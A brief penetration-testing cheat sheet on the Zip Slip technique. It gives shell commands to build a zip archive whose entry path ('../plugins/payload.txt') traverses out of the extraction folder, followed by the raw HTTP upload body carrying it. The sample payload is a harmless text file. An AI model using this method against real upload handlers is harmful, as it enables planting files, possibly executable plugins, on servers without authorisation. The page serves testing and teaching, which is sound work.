ZIP Slip
Create folder that imitate the desired path on the server
mkdir ../desired_folder Make file inside that folder
Remember that the path on the right will be used in the zip slip.
echo "test123" > ../plugins/payload.txtZip the file with path traversal
zip payload.zip ../plugins/payload.txtResult as HTTP Traffic
Content-Type: application/zip
PK
�����0[58n�������
�../folder/payload.txtUT �ÉhÉhux
�õ�����test123
PK
�����0[58n���������������¤����../folder/payload.txtUT�Éhux
�õ�����PK������\���X�����
------WebKitFormBoundarynxMw37lRujBsjUlU--Last updated